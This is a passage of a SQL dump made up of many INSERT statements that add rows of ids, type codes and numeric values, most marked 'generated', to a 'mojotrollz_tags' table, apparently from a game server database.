(19536, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19541, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19542, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19543, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19545, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19546, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19547, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19548, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19549, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19550, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19551, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19552, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19553, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19554, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19555, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19556, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19557, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19558, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19559, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19560, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19561, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19562, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19563, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19564, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19565, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19566, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19567, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19568, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19569, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19570, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19571, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19572, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19573, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19574, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19575, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19577, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19578, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19579, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19580, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19581, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19583, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19585, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19590, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19591, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19594, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19595, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19596, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19597, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19598, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19599, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19600, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19602, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19603, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19839, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19840, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19841, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19842, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19843, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19844, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19845, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19846, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19847, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19848, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19849, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19850, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19851, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19852, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19853, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19854, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19855, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19856, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19857, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19858, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19859, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19861, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19862, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19863, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19868, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19869, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19870, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19871, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19872, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19873, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19874, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19876, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19877, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19878, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19879, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19901, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19902, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19903, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19903, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19905, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19906, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20351, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20352, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20356, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20359, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20447, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20650, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20651, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20652, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20653, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20654, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20655, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20656, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20657, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20693, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20694, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20724, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20725, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20726, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20726, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20727, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20738, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20739, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20805, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20806, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20807, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20810, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20829, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20830, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20831, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20849, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20850, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20869, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20870, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20871, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20872, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20873, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20874, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20875, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20876, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20877, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20878, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20879, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20881, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20918, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20920, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20920, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20921, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20922, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20923, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20924, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20925, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20926, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20939, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20960, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20961, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20962, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20963, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20964, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20965, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20966, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20968, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20970, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20975, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20976, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20977, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20978, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20979, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20980, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20981, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20982, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20985, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20986, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20990, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20991, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20992, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21004, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21007, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21008, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21009, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21042, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21053, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21054, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21055, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21056, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21057, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21058, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21059, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21060, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21061, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21062, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21063, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21064, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21065, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21066, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21067, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21068, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21069, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21070, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21071, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21072, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21073, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21074, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21075, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21076, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21077, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21078, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21079, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21080, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21081, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21082, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21083, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21084, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21085, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21086, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21087, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21088, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21089, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21099, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21099, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21117, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21117, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21118, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21118, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21119, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21119, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21120, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21120, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21121, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21121, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21127, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21277, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21282, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21308, 2, 1, 0, 'generated'); 